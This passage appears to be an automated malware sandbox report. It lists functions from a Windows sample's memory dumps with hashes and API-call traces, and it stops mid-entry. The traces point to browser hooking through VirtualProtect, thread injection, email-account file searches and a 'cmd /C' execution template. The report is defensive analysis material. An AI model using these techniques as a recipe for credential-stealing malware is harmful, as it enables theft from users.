  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3464F, Relevance: 6.0, APIs: 4, Instructions: 32 Total matches: 128memorystring
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
